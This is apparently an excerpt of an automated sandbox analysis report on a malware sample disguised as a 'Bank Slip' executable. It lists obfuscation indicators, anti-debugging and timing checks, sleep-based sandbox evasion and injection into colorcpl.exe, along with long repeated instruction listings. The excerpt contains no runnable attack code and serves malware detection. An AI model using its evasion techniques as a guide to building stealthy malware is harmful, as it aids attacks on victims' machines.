                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, VUGUNiCOs42JoRZtJj.csHigh entropy of concatenated method names: 'FfbcrYrNwx', 'n3ecUg99G7', 'h6eXY7dpgZ', 'qOKXlPkuSL', 'w6pXkYwVeJ', 'W99XFld9bQ', 'WBjXxa9yD9', 'gatX4G5F49', 'PJTXnclCFh', 'HFMXDxVFFR'
                Source: 0.2.PO1268931024 - Bank Slip.exe.a020000.3.raw.unpack, YyI0SENKp6b8O6xuIMv.csHigh entropy of concatenated method names: 'UDUI0oI58O', 'gF2IQCfxnp', 'gJTIOZWOhr', 'LdyIeKZPoI', 'V2FIrL2wyx', 'lAVIRg22ge', 'klcIUiZf7l', 'hgjIwRBi7A', 'JHPI1KGEa9', 'ITtICR4rtb'
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: PO1268931024 - Bank Slip.exe PID: 6240, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: A1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: B1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: B400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeMemory allocated: C400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D096E rdtsc 2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 2005Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 7969Jump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe TID: 6520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe TID: 7004Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340Thread sleep count: 2005 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340Thread sleep time: -4010000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340Thread sleep count: 7969 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 340Thread sleep time: -15938000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0321C3B0 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C3B0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157731214.0000000000850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKN
                Source: colorcpl.exe, 00000007.00000002.4157400312.000000000358D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2277855201.000001A0CF57C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D096E rdtsc 2_2_017D096E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_00417563 LdrLoadDll,2_2_00417563
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01834180 mov eax, dword ptr fs:[00000030h]2_2_01834180
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01834180 mov eax, dword ptr fs:[00000030h]2_2_01834180
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184C188 mov eax, dword ptr fs:[00000030h]2_2_0184C188
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184C188 mov eax, dword ptr fs:[00000030h]2_2_0184C188
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181019F mov eax, dword ptr fs:[00000030h]2_2_0181019F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181019F mov eax, dword ptr fs:[00000030h]2_2_0181019F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181019F mov eax, dword ptr fs:[00000030h]2_2_0181019F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0181019F mov eax, dword ptr fs:[00000030h]2_2_0181019F
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796154 mov eax, dword ptr fs:[00000030h]2_2_01796154
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01796154 mov eax, dword ptr fs:[00000030h]2_2_01796154
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C156 mov eax, dword ptr fs:[00000030h]2_2_0178C156
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018561C3 mov eax, dword ptr fs:[00000030h]2_2_018561C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018561C3 mov eax, dword ptr fs:[00000030h]2_2_018561C3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h]2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h]2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h]2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0180E1D0 mov eax, dword ptr fs:[00000030h]2_2_0180E1D0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C0124 mov eax, dword ptr fs:[00000030h]2_2_017C0124
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018661E5 mov eax, dword ptr fs:[00000030h]2_2_018661E5
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C01F8 mov eax, dword ptr fs:[00000030h]2_2_017C01F8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov eax, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E10E mov ecx, dword ptr fs:[00000030h]2_2_0183E10E
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01850115 mov eax, dword ptr fs:[00000030h]2_2_01850115
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183A118 mov ecx, dword ptr fs:[00000030h]2_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h]2_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h]2_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183A118 mov eax, dword ptr fs:[00000030h]2_2_0183A118
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov eax, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov eax, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov ecx, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov eax, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01824144 mov eax, dword ptr fs:[00000030h]2_2_01824144
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01828158 mov eax, dword ptr fs:[00000030h]2_2_01828158
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864164 mov eax, dword ptr fs:[00000030h]2_2_01864164
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01864164 mov eax, dword ptr fs:[00000030h]2_2_01864164
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h]2_2_0178A197
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h]2_2_0178A197
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A197 mov eax, dword ptr fs:[00000030h]2_2_0178A197
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D0185 mov eax, dword ptr fs:[00000030h]2_2_017D0185
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017BC073 mov eax, dword ptr fs:[00000030h]2_2_017BC073
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01792050 mov eax, dword ptr fs:[00000030h]2_2_01792050
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018280A8 mov eax, dword ptr fs:[00000030h]2_2_018280A8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018560B8 mov eax, dword ptr fs:[00000030h]2_2_018560B8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018560B8 mov ecx, dword ptr fs:[00000030h]2_2_018560B8
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A020 mov eax, dword ptr fs:[00000030h]2_2_0178A020
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C020 mov eax, dword ptr fs:[00000030h]2_2_0178C020
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018120DE mov eax, dword ptr fs:[00000030h]2_2_018120DE
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018160E0 mov eax, dword ptr fs:[00000030h]2_2_018160E0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE016 mov eax, dword ptr fs:[00000030h]2_2_017AE016
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01814000 mov ecx, dword ptr fs:[00000030h]2_2_01814000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01832000 mov eax, dword ptr fs:[00000030h]2_2_01832000
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C0F0 mov eax, dword ptr fs:[00000030h]2_2_0178C0F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017D20F0 mov ecx, dword ptr fs:[00000030h]2_2_017D20F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017980E9 mov eax, dword ptr fs:[00000030h]2_2_017980E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0178A0E3
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01826030 mov eax, dword ptr fs:[00000030h]2_2_01826030
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01816050 mov eax, dword ptr fs:[00000030h]2_2_01816050
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017880A0 mov eax, dword ptr fs:[00000030h]2_2_017880A0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179208A mov eax, dword ptr fs:[00000030h]2_2_0179208A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018163C0 mov eax, dword ptr fs:[00000030h]2_2_018163C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0184C3CD mov eax, dword ptr fs:[00000030h]2_2_0184C3CD
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018343D4 mov eax, dword ptr fs:[00000030h]2_2_018343D4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_018343D4 mov eax, dword ptr fs:[00000030h]2_2_018343D4
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov ecx, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0183E3DB mov eax, dword ptr fs:[00000030h]2_2_0183E3DB
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0178C310 mov ecx, dword ptr fs:[00000030h]2_2_0178C310
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017B0310 mov ecx, dword ptr fs:[00000030h]2_2_017B0310
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h]2_2_017CA30B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h]2_2_017CA30B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017CA30B mov eax, dword ptr fs:[00000030h]2_2_017CA30B
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017C63FF mov eax, dword ptr fs:[00000030h]2_2_017C63FF
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h]2_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h]2_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017AE3F0 mov eax, dword ptr fs:[00000030h]2_2_017AE3F0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017A03E9 mov eax, dword ptr fs:[00000030h]2_2_017A03E9
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov eax, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov ecx, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov eax, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_01868324 mov eax, dword ptr fs:[00000030h]2_2_01868324
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_0179A3C0 mov eax, dword ptr fs:[00000030h]2_2_0179A3C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeCode function: 2_2_017983C0 mov eax, dword ptr fs:[00000030h]2_2_017983C0
